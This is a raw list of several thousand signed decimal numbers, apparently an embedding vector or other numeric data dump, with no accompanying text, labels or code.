-0.04378841072320938, -0.027309732511639595, 0.023781903088092804, 0.017453473061323166, -0.011125041171908379, -0.03134816884994507, -0.02500426582992077, -0.02255954220890999, -0.008997512981295586, -0.014443986117839813, -0.02540656179189682, 0.015968071296811104, -0.026721762493252754, -0.010127036832273006, 0.055362168699502945, 0.006846774369478226, -0.009206397458910942, -0.00014977318642195314, 0.011751695536077023, -0.0006701715756207705, -0.011465446092188358, -0.029878240078687668, -0.00689319334924221, 0.011086358688771725, -0.027479935437440872, -0.013268043287098408, -0.020470695570111275, 0.0494205579161644, -0.007365117780864239, -0.014823073521256447, -0.021321706473827362, 0.03277168050408363, -0.018412794917821884, -0.02149190939962864, -0.029336687177419662, 0.01499327551573515, -0.007160101551562548, 0.00398041307926178, 0.003717373125255108, -0.02393663302063942, -0.009469437412917614, -0.0028489544056355953, 0.007589475251734257, -0.002311269985511899, -0.02912006713449955, 0.008254812099039555, 0.001757145393639803, -0.02167758345603943, -0.011813587509095669, -0.0026555426884442568, 0.002928253263235092, -0.008138764649629593, -0.028609460219740868, 0.011914161033928394, -0.00043372574145905674, -0.012153991498053074, -0.013523346744477749, 0.003823749488219619, -0.03224559873342514, -0.015086113475263119, 0.00647542392835021, -0.025344669818878174, -0.023503391072154045, 0.033173974603414536, -0.017561784014105797, -0.000287941686110571, 0.0009269256261177361, 0.01001099031418562, 0.00835538562387228, 0.018350902944803238, -0.008479169569909573, -0.03178141266107559, 0.031239859759807587, 0.02022312767803669, -0.04945150390267372, 0.018938874825835228, -0.016169218346476555, -0.008169710636138916, 0.011449973098933697, -0.006483160424977541, -0.003127467352896929, 0.049977585673332214, 0.010629907250404358, 0.02639682963490486, 0.014598716050386429, -0.018103335052728653, -0.011960580013692379, 0.0038662999868392944, 0.009159978479146957, -0.028470203280448914, 0.04855407401919365, -0.02715500444173813, 0.015109322965145111, -0.008409541100263596, 0.027232369408011436, 0.010219874791800976, -0.006556656677275896, -0.01001872681081295, 0.010606697760522366, -0.012037944979965687, 0.025251831859350204, -0.043417058885097504, -0.002042427659034729, 0.0012271972373127937, -0.006804224103689194, -0.016679825261235237, -0.029630674049258232, -0.022745216265320778, -0.029971078038215637, -0.027124058455228806, 0.0020269546657800674, -0.00046346281305886805, 0.019913669675588608, 0.00039165871567092836, 0.03422613441944122, 0.0054000550881028175, -0.02501973882317543, 0.024385347962379456, -0.00933018047362566, -0.004065514076501131, 0.01100125815719366, -0.02316298708319664, 0.009484910406172276, 0.011411290615797043, 0.003243514336645603, 0.00019147759303450584, 0.013732231222093105, 0.023395080119371414, -0.03196708858013153, -0.018196173012256622, -0.01138034462928772, -0.01818070001900196, 0.012254565954208374, 0.02659797854721546, -0.00107440201099962, -0.008053663186728954, 0.020842045545578003, 0.006463819183409214, 0.000822483270894736, 0.012625915929675102, 0.016927393153309822, 0.02101224847137928, -0.0168964471668005, -0.010606697760522366, 0.01779387705028057, -0.0249114278703928, -0.019310224801301956, 0.0048120832070708275, 0.029166486114263535, 0.013755440711975098, -0.03342154249548912, -0.012958584353327751, -0.010034199804067612, 0.003856629366055131, 0.0010357196442782879, -0.006169833708554506, -0.0030326955020427704, -0.005001626908779144, 0.012656861916184425, 0.009469437412917614, 0.051741499453783035, -0.013515610247850418, 0.004084855318069458, -0.015233105979859829, 0.006575997918844223, -0.008572006598114967, 0.014204155653715134, -0.011914161033928394, -0.016463205218315125, -0.02922837808728218, 0.010537070222198963, -0.030435265973210335, -0.0068738521076738834, -0.016664352267980576, 0.0026903569232672453, 0.009368862956762314, 0.006432873196899891, 0.01680360920727253, 0.0020811099093407393, -0.010738218203186989, -0.022017989307641983, -0.010475178249180317, 0.03391667827963829, -0.030899453908205032, 0.014459459111094475, -0.002589782699942589, 0.0024253828451037407, -0.009740213863551617, 0.01391790620982647, -0.00205016415566206, -0.012865746393799782, 0.005941607523709536, -0.03911558538675308, -0.011651121079921722, 0.004432996269315481, -0.022126300260424614, 0.002291928743943572, -0.017035704106092453, -0.021553801372647285, -0.015859760344028473, 0.028269054368138313, -0.025236358866095543, -0.02959972806274891, -0.0068545108661055565, 0.020083872601389885, 0.09822220355272293, 0.0003766693116631359, 0.013376353308558464, 0.005222116131335497, -0.0012794184731319547, 0.010119300335645676, -0.004471678752452135, 0.00883504655212164, -0.005875847768038511, 0.0023538204841315746, 0.02881060726940632, 0.00037352635990828276, 0.006421268917620182, -0.010467441752552986, -0.004610935226082802, 0.004003622569143772, -0.008556533604860306, -0.004757928196340799, 0.0045877257362008095, -0.004939734935760498, 0.016958339139819145, 0.0002799634530674666, 0.006363245192915201, -0.010954839177429676, 0.023132041096687317, -0.020640896633267403, -0.01269554439932108, -0.0034717400558292866, -0.030559049919247627, -0.012006998993456364, 0.003823749488219619, 0.007388327270746231, -0.009245079942047596, -0.008641635067760944, 0.008780892007052898, -0.007720995228737593, 0.018041444942355156, 0.010738218203186989, -0.012324194423854351, -0.019403062760829926, -0.003972676582634449, -0.028284527361392975, -0.01985177770256996, 0.015140268951654434, -0.020548060536384583, -0.03391667827963829, 0.02647419460117817, -0.0032589873299002647, -0.012548551894724369, 0.002392502734437585, -0.009624166414141655, -0.019387589767575264, 0.0030752462334930897, 0.027975069358944893, 0.003804408246651292, 0.007481164764612913, -0.0072606755420565605, 0.000504321011248976, -0.015821076929569244, -0.023317715153098106, -0.0066804406233131886, 0.011697540059685707, -0.00810781866312027, 0.009949098341166973, -0.008169710636138916, -0.0006542151095345616, -0.024168727919459343, 0.0033789025619626045, -0.0001732243545120582, 0.01461418904364109, -0.005454210098832846, 0.010366867296397686, 0.014180946163833141, -0.003446596674621105, 0.0072800167836248875, 0.0028663615230470896, -0.023967579007148743, 0.0229773111641407, -0.03230749070644379, -0.0015028089983388782, 0.024478185921907425, 0.03422613441944122, -0.00730322627350688, 0.022203663364052773, -0.027975069358944893, 0.025437507778406143, 0.010823318734765053, -0.001409004325978458, -0.001730067771859467, 0.0116201750934124, 0.0012020537396892905, 0.002365425229072571, -0.006827433127909899, 0.024354401975870132, -0.005129278637468815, 0.006703649647533894, 0.010134773328900337, -0.01827353797852993, -0.001425444264896214, -0.034752216190099716, -0.002692291047424078, 0.001664307783357799, 0.027866758406162262, -0.0040577775798738, -0.009616429917514324, 0.008463696576654911, -0.011449973098933697, 0.027990542352199554, -0.004146746825426817, -0.017128540202975273, -0.035804376006126404, -0.009732477366924286, -0.013090104795992374, -0.020671842619776726, 0.016556041315197945, 0.008982039988040924, 0.001795827760361135, 0.002798667410388589, -0.020346911624073982, -0.021476436406373978, -0.020285019651055336, -0.006150492466986179, 0.048399344086647034, -0.013028212822973728, -0.0027309732977300882, 0.017902188003063202, -0.001908006495796144, 0.00001579025229148101, 0.02393663302063942, 0.03148742765188217, 0.028563041239976883, 0.005949344020336866, -0.005268535111099482, -0.00977889634668827, 0.020934883505105972, -0.026737233623862267, 0.04279814288020134, 0.004305344540625811, 0.007175574544817209, -0.006320694461464882, -0.0072103883139789104, 0.030512630939483643, 0.016633406281471252, -0.010003253817558289, 0.01006514485925436, 0.000450891035143286, 0.008664844557642937, 0.018211646005511284, 0.026118317618966103, 0.013105577789247036, 0.006900929845869541, -0.03261695057153702, 0.015759186819195747, 0.022822581231594086, -0.006684308405965567, -0.006200779229402542, 0.01827353797852993, -0.010838791728019714, -0.008471433073282242, 0.010436495766043663, 0.013987534679472446, -0.0031100602354854345, 0.019480427727103233, -0.0025839803274720907, -0.008982039988040924, 0.02433892898261547, -0.018598468974232674, -0.055269330739974976, -0.029166486114263535, -0.012339667417109013, -0.00012015702668577433, 0.016556041315197945, -0.023642648011446, 0.00820065662264824, 0.015426517464220524, -0.004239584784954786, -0.009593220427632332, -0.006811960134655237, 0.023580756038427353, -0.010467441752552986, -0.012285511940717697, 0.02463291585445404, 0.013453718274831772, -0.01650962419807911, 0.031193440780043602, -0.009059404022991657, -0.002535627456381917, 0.006726859137415886, -0.025452980771660805, 0.018830563873052597, 0.009593220427632332, 0.03397857025265694, -0.016850028187036514, -0.0026091239415109158, -0.006676572374999523, -0.008927884511649609, 0.018613941967487335, -0.014095845632255077, 0.005585730075836182, -0.007864120416343212, 0.0016101524233818054, -0.003264789702370763, -0.022157244384288788, -0.0032957354560494423, -0.0037889352533966303, -0.019991034641861916, 0.010459705255925655, 0.01985177770256996, -0.014103582128882408, 0.0011865808628499508, -0.01779387705028057, 0.010591224767267704, -0.0002806887496262789, 0.007160101551562548, 0.015983544290065765, -0.010761427693068981, 0.004576120991259813, -0.030326955020427704, -0.011148250661790371, 0.003827617736533284, -0.0012194608571007848, 0.023193931207060814, 0.002377029974013567, -0.0001964337716344744, -0.007585607003420591, 0.004970680922269821, 0.022435758262872696, -0.0183663759380579, -0.021754948422312737, 0.006575997918844223, -0.021043194457888603, 0.005577993579208851, 0.025344669818878174, 0.02757277339696884, -0.008734473027288914, -0.023302242159843445, 0.004935866687446833, 0.008432750590145588, 0.005446473602205515, -0.025066157802939415, 0.014211892150342464, 0.0002050164039246738, -0.02099677547812462, -0.0053497678600251675, 0.005175697151571512, -0.0001839828910306096, 0.017252324149012566, 0.006483160424977541, -0.011836796998977661, 0.023890214040875435, -0.014111318625509739, -0.00038005399983376265, -0.016880974173545837, 0.019294751808047295, -0.013151995837688446, 0.018196173012256622, 0.009616429917514324, -0.00020138993568252772, -0.015658611431717873, -0.005280139856040478, 0.018118808045983315, -0.015573510900139809, 0.017639147117733955, 0.022992784157395363, -0.00684290612116456, 0.02325582318007946, -0.004777268972247839, -0.01711306720972061, 0.005458078347146511, 0.009941361844539642, 0.010784637182950974, 0.0027657875325530767, 0.015178950503468513, -0.00434789527207613, 0.008486906066536903, -0.022838054224848747, -0.0028218769002705812, -0.03000202402472496, -0.007751941215246916, -0.00005539432095247321, -0.01187547855079174, 0.06350093334913254, 0.029151013121008873, -0.015689557418227196, 0.022946365177631378, -0.009299234487116337, -0.012370612472295761, -0.008742209523916245, -0.015511618927121162, -0.011612438596785069, 0.0067616733722388744, 0.010931629687547684, -0.006270407699048519, -0.023812849074602127, 0.03274073451757431, -0.006432873196899891, -0.0070169768296182156, 0.04335516691207886, -0.033947624266147614, 0.013020476326346397, 0.02266785129904747, 0.006521842908114195, 0.018737725913524628, 0.015411044470965862, -0.009446227923035622, 0.004390446003526449, -0.011287507601082325, 0.0038082764949649572, 0.008223866112530231, 0.00031429401133209467, 0.021244341507554054, -0.011210142634809017, -0.0012890889775007963, -0.03447370231151581, 0.008680317550897598, 0.00387016823515296, -0.00503257242962718, -0.026613451540470123, -0.020671842619776726, 0.008308966644108295, 0.02686101756989956, -0.02432345598936081, -0.020842045545578003, -0.018521105870604515, -0.005539311096072197, -0.012896692380309105, -0.00096754205878824, -0.0009008150082081556, 0.00139256427064538, -0.01955779269337654, 0.02314751408994198, 0.009833050891757011, 0.008680317550897598, 0.011805851012468338, 0.006839037872850895, -0.004723113961517811, 0.0030713779851794243, 0.00767070846632123, 0.0025511004496365786, -0.011527338065207005, -0.027294259518384933, 0.03676369786262512, -0.010351394303143024, 0.0020579006522893906, 0.0320599265396595, -0.003100389614701271, 0.013709021732211113, -0.0008616491686552763, -0.005933871027082205, -0.024787643924355507, -0.032895464450120926, 0.0022957969922572374, 0.0003648228303063661, 0.00967058539390564, 0.022497650235891342, 0.009028458967804909, 0.001524084247648716, 0.006247198209166527, -0.00022750052448827773, -0.03759923577308655, -0.024199672043323517, -0.0018973688129335642, -0.006026708986610174, -0.0005226951325312257, -0.010537070222198963, 0.009662848897278309, -0.0247102789580822, 0.010359130799770355, 0.013097841292619705, -0.027913177385926247, -0.008239339105784893, -0.0005681468755938113, 0.010274030268192291, 0.011674330569803715, -0.013113313354551792, -0.01231645792722702, 0.027201423421502113, -0.006270407699048519, -0.03397857025265694, 0.03193614259362221, 0.007465691771358252, -0.010436495766043663, -0.008958830498158932, 0.0026555426884442568, -0.003489147173240781, 0.01847468689084053, -0.009693794883787632, 0.0035297637805342674, -0.01548840943723917, -0.0075972117483615875, 0.0016865500947460532, 0.012656861916184425, 0.018799617886543274, 0.03837288171052933, 0.0016517359763383865, 0.0016159547958523035, 0.031317222863435745, -0.007067263592034578, -0.013546556234359741, 0.001996008912101388, 0.007144628558307886, -0.002009547548368573, -0.010792373679578304, 0.011852269060909748, -0.01367807574570179, 0.004336290527135134, -0.006061522755771875, -0.022048935294151306, 0.029383106157183647, -0.008982039988040924, 0.017035704106092453, -0.003723175497725606, 0.025654129683971405, -0.0033653636928647757, 0.0004426710365805775, -0.007314831018447876, -0.03363816440105438, -0.0008263515192084014, -0.016958339139819145, -0.013059158809483051, -0.004966812673956156, -0.012409294955432415, -0.010026463307440281, -0.04316949471831322, 0.005477419588714838, -0.01650962419807911, 0.015542564913630486, -0.020733734592795372, 0.0064057959243655205, 0.01700475811958313, -0.017314216122031212, 0.010328184813261032, 0.006757805123925209, 0.010127036832273006, 0.015782395377755165, -0.004092591814696789, -0.011898688040673733, -0.015434253960847855, -0.009546802379190922, -0.0052182478830218315, 0.00991815235465765, -0.004185429308563471, -0.009755686856806278, -0.003278328338637948, 0.0054426053538918495, -0.017639147117733955, -0.020192181691527367, 0.01417320966720581, -0.001924446551129222, -0.0017610136419534683, 0.023967579007148743, 0.009098086506128311, 0.0059106620028615, 0.015712767839431763, 0.004243453033268452, 0.0029572651255875826, 0.01416547317057848, 0.01465287059545517, -0.006614680401980877, -0.0023538204841315746, 0.0056630950421094894, -0.029089121147990227, 0.019109075888991356, 0.004173824563622475, 0.01509384997189045, 0.015782395377755165, -0.0029379238840192556, -0.007508242502808571, -0.012424767948687077, -0.01593712531030178, 0.016757190227508545, -0.005063518416136503, 0.01728327013552189, -0.005674699321389198, 0.00048425456043332815, -0.014072636142373085, -0.005806219298392534, -0.01935664378106594, 0.009554537944495678, 0.014111318625509739, 0.01490043755620718, 0.007624289486557245, -0.003512356663122773, 0.017438000068068504, -0.0021836182568222284, 0.02698480151593685, -0.010428759269416332, 0.00967832189053297, 0.014637398533523083, 0.013144259341061115, 0.0020598347764462233, 0.006606943905353546, -0.022296501323580742, 0.01411905512213707, 0.021430017426609993, 0.01720590516924858, 0.016880974173545837, 0.009863996878266335, 0.0034736741799861193, -0.008804100565612316, -0.00247760396450758, -0.001395465456880629, 0.02433892898261547, -0.0015792065532878041, 0.008425014093518257, -0.015271788462996483, -0.009871733374893665, 0.0014186748303472996, -0.004688299726694822, -0.011589229106903076, -0.0022822581231594086, 0.005678567569702864, 0.004997758660465479, 0.012958584353327751, -0.0016710771014913917, 0.019573265686631203, -0.009345653466880322, -0.002883768640458584, -0.029058175161480904, -0.017453473061323166, 0.0032667238265275955, 0.006811960134655237, -0.006208515726029873, -0.01212304551154375, -0.00422798004001379, 0.01720590516924858, 0.010947102680802345, 0.00301528861746192, -0.009121295996010303, -0.0005642786854878068, -0.0024021733552217484, -0.003723175497725606, -0.006974426098167896, -0.01825806498527527, -0.010583488270640373, 0.018056917935609818, 0.024509131908416748, -0.01256402488797903, -0.00796856265515089, -0.020470695570111275, 0.009353389963507652, 0.006978294346481562, 0.007384459022432566, 0.02257501520216465, -0.0037928035017102957, -0.012765172868967056, -0.0012310654856264591, -0.00789506547152996, -0.01577465981245041, 0.0017087924061343074, 0.005995763000100851, -0.007531451992690563, -0.0022474441211670637, -0.021321706473827362, 0.008092345669865608, 0.007829305715858936, -0.011790378019213676, 0.003363429568707943, -0.011813587509095669, 0.01050612423568964, -0.0008384397369809449, -0.005152488127350807, 0.004436864517629147, 0.00525306211784482, 0.002324808621779084, 0.0014360819477587938, 0.0015850089257583022, 0.004498756490647793, -0.0030462343711405993, 0.004135142546147108, -0.01343050878494978, 0.017360635101795197, -0.012502132914960384, 0.0072103883139789104, -0.006931875832378864, 0.006417400669306517, -0.009732477366924286, -0.021522855386137962, 0.009484910406172276, -0.01295084785670042, 0.027913177385926247, 0.004491019994020462, -0.023116568103432655, 0.0020211522933095694, -0.02161569334566593, -0.02404494397342205, 0.024601969867944717, -0.011217879131436348, -0.017515365034341812, -0.0038585634902119637, 0.009616429917514324, 0.013128786347806454, -0.011945107020437717, -0.016850028187036514, 0.0007775150588713586, -0.009964571334421635, -0.007697786204516888, 0.0010763361351564527, 0.009415281936526299, 0.012625915929675102, -0.0072606755420565605, 0.014799864031374454, -0.005187301896512508, -0.014784391038119793, 0.0006111810216680169, 0.007020845077931881, 0.015016485005617142, 0.005821692291647196, -0.012834801338613033, -0.018505632877349854, -0.0021101217716932297, -0.01269554439932108, -0.0025259568355977535, -0.008757682517170906, -0.005763669032603502, -0.013902433216571808, 0.00992588885128498, -0.003514290787279606, -0.015859760344028473, -0.05335068702697754, 0.007775150705128908, 0.012030208483338356, 0.0023538204841315746, 0.014320203103125095, 0.0028992414008826017, -0.005968685261905193, -0.0029398580081760883, -0.010947102680802345, -0.004707640968263149, 0.0036806247662752867, -0.005326558370143175, 0.010243084281682968, 0.007809964939951897, 0.019666101783514023, -0.01460645254701376, 0.030234118923544884, -0.00943075492978096, -0.007465691771358252, -0.006196910981088877, -0.0031371379736810923, -0.0027657875325530767, -0.018815090879797935, 0.0030056179966777563, -0.0007808997761458158, -0.015008748508989811, -0.0010221808915957808, 0.014219628646969795, -0.004541306756436825, -0.00037691107718274, 0.0124557139351964, -0.005550915841013193, 0.02501973882317543, 0.0034175848122686148, 0.018242591992020607, 0.018350902944803238, -0.01700475811958313, -0.0018083994509652257, -0.0022223005071282387, -0.0007407668163068593, 0.023921160027384758, 0.0034582014195621014, 0.0002903593413066119, 0.00459546223282814, 0.01211530901491642, -0.007527583744376898, 0.0027348415460437536, -0.010243084281682968, 0.011109568178653717, 0.01700475811958313, 0.01858299784362316, 0.0007359315641224384, 0.0076165529899299145, -0.004398182034492493, -0.0005502562853507698, -0.0181652270257473, -0.009121295996010303, -0.014010744169354439, -0.00933018047362566, -0.0131906783208251, 0.004394313786178827, -0.0017358700279146433, -0.006320694461464882, 0.0065179746598005295, -0.004966812673956156, 0.01231645792722702, -0.024462712928652763, -0.021646637469530106, -0.001869324129074812, 0.001050225575454533, -0.0009752785554155707, 0.00883504655212164, 0.013376353308558464, 0.004777268972247839, -0.011395817622542381, 0.004320817533880472, -0.038249097764492035, -0.0036284036468714476, 0.006819696631282568, 0.0036303377710282803, 0.013554292730987072, 0.017964079976081848, 0.003525895532220602, 0.005806219298392534, 0.014428513124585152, -0.007864120416343212, 0.013585238717496395, 0.01886150985956192, 0.009585483931005001, -0.00615822896361351, 0.0011875479249283671, 0.011310717090964317, 0.011658857576549053, 0.0013277713442221284, -0.0010482914512977004, 0.005419395864009857, 0.0007368986262008548, 0.009933625347912312, -0.02051711454987526, 0.01387148816138506, -0.016370367258787155, -0.013422772288322449, 0.002995947375893593, -0.013445981778204441, -0.022219136357307434, -0.0018789947498589754, 0.0032551190815865993, -0.012780645862221718, -0.016200164332985878, -0.022311974316835403, 0.006340035703033209, 0.007024713326245546, 0.009600956924259663, 0.025282777845859528, -0.00036071284557692707, -0.000025234183340216987, 0.015287261456251144, 0.006463819183409214, -0.015612193383276463, -0.007276148535311222, -0.006084732245653868, 0.03233843669295311, 0.01876867190003395, 0.006312957964837551, 0.005717250052839518, 0.014637398533523083, 0.000592323369346559, 0.0011981854913756251, 0.004870106931775808, -0.00981757789850235, 0.011364871636033058, -0.0200374536216259, -0.0009805973386391997, -0.013562029227614403, 0.004235716536641121, 0.012370612472295761, -0.004846897441893816, 0.006579866167157888, 0.0006663033273071051, -0.005833297036588192, -0.016370367258787155, -0.003775396617129445, 0.00981757789850235, 0.014235101640224457, 0.010397813282907009, 0.018227118998765945, -0.00012015702668577433, 0.0020153499208390713, -0.04344800487160683, -0.024447239935398102, -0.0060731275007128716, 0.013817332684993744, -0.012587234377861023, 0.020656369626522064, -0.017917660996317863, 0.011202406138181686, 0.0016594724729657173, 0.008332176133990288, -0.02619568258523941, -0.0020714392885565758, 0.005419395864009857, 0.019882723689079285, -0.009500383399426937, -0.013647129759192467, -0.002436987590044737, 0.041374631226062775, -0.00392045546323061, 0.006831301376223564, 0.005508365575224161, -0.004378841258585453, -0.02921290509402752, 0.0025317592080682516, 0.010985785163939, -0.004966812673956156, -0.015325943939387798, 0.0008413409232161939, -0.01661793328821659, -0.00967058539390564, 0.009477173909544945, -0.008262548595666885, -0.014892701990902424, -0.00214880402199924, -0.015333680436015129, -0.0088505195453763, 0.005647622048854828, -0.0012368678580969572, 0.013082368299365044, -0.002862493274733424, 0.002344149863347411, 0.004866238683462143, -0.0018354770727455616, 0.0016565712867304683, -0.005342031363397837, -0.027216896414756775, 0.008239339105784893, 0.0017561783315613866, 0.001554063055664301, -0.009113559499382973, 0.02314751408994198, 0.04827556386590004, -0.01187547855079174, 0.022157244384288788, 0.006181437987834215, -0.00647542392835021, -0.021337179467082024, -0.016679825261235237, -0.006243329960852861, 0.0027561169117689133, -0.007922143675386906, 0.010676326230168343, -0.01612279936671257, -0.00991041585803032, 0.011651121079921722, -0.006401927676051855, -0.021043194457888603, -0.009299234487116337, 0.007759677711874247, -0.0007954056491144001, -0.013453718274831772, -0.012649125419557095, 0.03862044960260391, -0.014768918044865131, -0.008958830498158932, 0.011210142634809017, 0.00446781050413847, 0.01163564808666706, -0.022544069215655327, 0.001126623246818781, -0.00786798819899559, -0.00301528861746192, -0.005342031363397837, 0.010583488270640373, -0.000674523354973644, -0.007813832722604275, 0.019526846706867218, 0.018010498955845833, 0.004579989239573479, 0.01040554977953434, -0.014142263680696487, -0.016354894265532494, 0.006514106411486864, 0.01558124739676714, 0.015325943939387798, 0.028872499242424965, -0.006247198209166527, -0.0020985170267522335, 0.005473551340401173, 0.00026908403378911316, -0.009608693420886993, -0.031905196607112885, -0.003204832086339593, 0.010250820778310299, 0.004015226848423481, 0.023132041096687317, 0.021847786381840706, -0.002191354753449559, -0.0014999078121036291, -0.004332422278821468, -0.01708212122321129, -0.03549491614103317, -0.006100205238908529, 0.029940132051706314, 0.022729743272066116, 0.010382340289652348, -0.00241764634847641, -0.0007828339003026485, -0.010444232262670994, 0.010684062726795673, -0.007999508641660213, -0.01818070001900196, -0.0063361674547195435, -0.009353389963507652, 0.0146606070920825, 0.00220876163803041, 0.037970587611198425, 0.030218645930290222, 0.005794614553451538, -0.006753936875611544, -0.007991772145032883, -0.0009602891514077783, 0.010877474211156368, 0.0049010529182851315, -0.017747458070516586, -0.008641635067760944, 0.022992784157395363, 0.007976299151778221, 0.016293002292513847, 0.02051711454987526, -0.004951339680701494, 0.006413532420992851, 0.022033462300896645, 0.009987780824303627, 0.02334866113960743, -0.009732477366924286, -0.006920271087437868, 0.01797955296933651, 0.000397461059037596, -0.011426763609051704, 0.008247075602412224, -0.019882723689079285, 0.006076995749026537, 0.01630847528576851, 0.014823073521256447, 0.01196831651031971, -0.007457955274730921, 0.0027406439185142517, -0.016091853380203247, 0.024787643924355507, -0.01807239092886448, 0.004614803474396467, -0.0229773111641407, 0.005109937395900488, 0.006231725215911865, 0.03145648166537285, 0.018490159884095192, -0.028516622260212898, 0.022513123229146004, 0.0050867279060184956, -0.01923285983502865, -0.019604211673140526, -0.012625915929675102, 0.005891320761293173, -0.01740705408155918, 0.00241764634847641, -0.012927638366818428, -0.014621925540268421, -0.0280524343252182, 0.0028025356587022543, 0.006537315901368856, 0.011844532564282417, -0.003585853148251772, 0.01777840405702591, -0.008742209523916245, 0.0185675248503685, -0.008680317550897598, -0.027603719383478165, -0.019093604758381844, 0.00454517500475049, 0.008525588549673557, 0.019805358722805977, -0.027479935437440872, -0.007531451992690563, -0.012873482890427113, 0.021754948422312737, 0.007647498976439238, 0.00003729219679371454, 0.00289537338539958, -0.002653608564287424, -0.01246345043182373, 0.0010241150157526135, -0.0028334814123809338, -0.018830563873052597, -0.010096090845763683, 0.016571514308452606, -0.009167714975774288, -0.005249193869531155, 0.003572314279153943, -0.0001976425846805796, -0.008045926690101624, 0.019604211673140526, 0.0075972117483615875, -0.020857518538832664, -0.008061399683356285, -0.010668589733541012, -0.014915910549461842, -0.01749989204108715, -0.005930002778768539, -0.011217879131436348, 0.010366867296397686, 0.0050557819195091724, -0.008749946020543575, -0.005763669032603502, -0.01876867190003395, 0.01728327013552189, 0.006247198209166527, 0.02980087511241436, 0.010204401798546314, 0.016076380386948586, 0.0010560279479250312, 0.005724986549466848, -0.028006015345454216, -0.012432504445314407, -0.02187873236835003, -0.01196831651031971, -0.00537297734990716, 0.020362384617328644, -0.01441304013133049, -0.001386761898174882, 0.02238933928310871, 0.0016923524672165513, -0.0016439994797110558, 0.01700475811958313, 0.015086113475263119, -0.026427775621414185, -0.0033324838150292635, 0.011883215047419071, 0.011287507601082325, -0.023704538121819496, 0.020207654684782028, 0.012169464491307735, -0.002377029974013567, 0.0024137781001627445, 0.01500101201236248, 0.0026884227991104126, -0.0313945896923542, -0.03998206928372383, -0.01328351628035307, -0.008038190193474293, -0.01767009310424328, 0.006796487607061863, -0.00869579054415226, 0.02266785129904747, 0.011952843517065048, 0.0019776346161961555, -0.00012958583829458803, 0.002549166325479746, 0.009879469871520996, 0.00019232377235312015, 0.0020714392885565758, -0.006131151225417852, 0.0019196112407371402, -0.009546802379190922, -0.0021642770152539015, -0.012378348968923092, 0.01353108324110508, -0.011860005557537079, -0.0069860308431088924, -0.002941792132332921, 0.004421391524374485, 0.010451968759298325, -0.00605765450745821, -0.002858625026419759, 0.004897184669971466, -0.016958339139819145, -0.022636907175183296, -0.010931629687547684, -4.268656823569472e-7, 0.02393663302063942, 0.014459459111094475, -0.014707026071846485, -0.0011469314340502024, -0.01582881435751915, -0.014134527184069157, -0.024013997986912727, 0.014335676096379757, 0.015449726954102516, -0.0005275304429233074, -0.016200164332985878, -0.012641388922929764, -0.023812849074602127, 0.03397857025265694, -0.0023344792425632477, 0.010250820778310299, -0.031812358647584915, 0.007113682571798563, 0.00820839311927557, -0.010366867296397686, 0.005922266282141209, -0.01353108324110508, 0.019078131765127182, -0.0021836182568222284, -0.005342031363397837, 0.0032338437158614397, 0.0379396416246891, -0.009415281936526299, 0.010328184813261032, 0.012935374863445759, 0.01524084247648716, 0.020068399608135223, 0.0070788683369755745, 0.010877474211156368, -0.0022899946197867393, 0.022126300260424614, 0.0005396186606958508, -0.0014825006946921349, -0.007879593409597874, -0.011256561614573002, 0.002214564010500908, 0.025050684809684753, 0.003139072097837925, -0.00929149892181158, -0.01295084785670042, -0.014033953659236431, 0.014792127534747124, 0.0004102745733689517, -0.008951094001531601, 0.02217271737754345, 0.0033653636928647757, 0.008881465531885624, 0.012014735490083694, -0.014211892150342464, 0.002524022711440921, -0.003286064835265279, 0.002324808621779084, 0.0034775424282997847, 0.01601449027657509, 0.0028915051370859146, -0.00617756973952055, 0.0068545108661055565, -0.010281766764819622, -0.00908261351287365, 0.013809596188366413, -0.014459459111094475, 0.016076380386948586, 0.016153745353221893, -0.009484910406172276, -0.015743713825941086, -0.03877517953515053, -0.007454087026417255, 0.008633898571133614, -0.028903445228934288, -0.0022223005071282387, -0.034535594284534454, -0.007218124810606241, 0.029785403981804848, 0.004034568089991808, -0.009384335950016975, -0.0049049207009375095, 0.000981564400717616, -0.004301476292312145, -0.0032531849574297667, 0.0023886344861239195, -0.008370858617126942, 0.018412794917821884, 0.00545034185051918, -0.03496883809566498, 0.0011682066833600402, -0.001115985563956201, -0.0384657196700573, 0.005020968150347471, 0.014691553078591824, -0.04604746028780937, 0.009809841401875019, 0.014737972058355808, -0.009701531380414963, -0.005639885552227497, -0.010962575674057007, -0.010568015277385712, -0.01304368581622839, 0.012919901870191097, -0.015418780967593193, 0.00003333329732413404, 0.0013171337777748704, -0.00550062907859683, 0.01026629377156496, -0.011860005557537079, -0.016958339139819145, -0.006061522755771875, 0.005833297036588192, -0.01748441904783249, -0.000016228450476774015, 0.0015414913650602102, 0.004696036223322153, -0.02423061802983284, 0.022219136357307434, 0.004444601014256477, 0.02200251631438732, 0.009662848897278309, 0.002529825083911419, 0.00014590495266020298, 0.0009177385363727808, -0.0028682956472039223, -0.013136522844433784, 0.02365812100470066, -0.003943664953112602, 0.0024543944746255875, 0.005063518416136503, 0.006730727385729551, -0.022636907175183296, 0.0022164981346577406, 0.014498141594231129, -0.015364626422524452, -0.006173701956868172, 0.0013045619707554579, 0.018598468974232674, 0.009840787388384342, -0.013074631802737713, -0.004761796444654465, -0.005852638278156519, 0.02463291585445404, 0.014304730109870434, 0.007809964939951897, -0.008138764649629593, 0.004622539971023798, -0.020934883505105972, -0.01700475811958313, 0.011357135139405727, -0.0044059185311198235, -0.005581861827522516, 0.007608816493302584, -0.0140262171626091, 0.009964571334421635, 0.023487918078899384, -0.012494396418333054, 0.015186687000095844, -0.016463205218315125, 0.005314953625202179, 0.0032551190815865993, 0.014560033567249775, -0.009368862956762314, 0.013484664261341095, -0.019526846706867218, -0.008819573558866978, 0.009376599453389645, -0.01807239092886448, -0.01090068370103836, -0.014320203103125095, -0.016200164332985878, -0.006417400669306517, -0.003185490844771266, 0.030559049919247627, 0.009453964419662952, -0.0075546614825725555, 0.014931383542716503, 0.0166952982544899, 0.013329935260117054, -0.01231645792722702, 0.017855769023299217, 0.00755079323425889, 0.008146501146256924, -0.00991041585803032, -0.006815828382968903, -0.01353881973773241, -0.005071254912763834, -0.00471537746489048, -0.01788671500980854, 0.002299665240570903, 0.018397321924567223, 0.011310717090964317, 0.026613451540470123, 0.011210142634809017, -0.0013944983948022127, 0.006997635588049889, -0.000882924476172775, -0.025375615805387497, -0.0012126914225518703, 0.017051177099347115, 0.0068738521076738834, 0.0014621925074607134, -0.018149754032492638, 0.009987780824303627, -0.003547170665115118, -0.006196910981088877, -0.013794123195111752, -0.013128786347806454, -0.00884278304874897, 0.008262548595666885, -0.010382340289652348, 0.00028576579643413424, 0.015078376978635788, -0.008030453696846962, 0.011527338065207005, 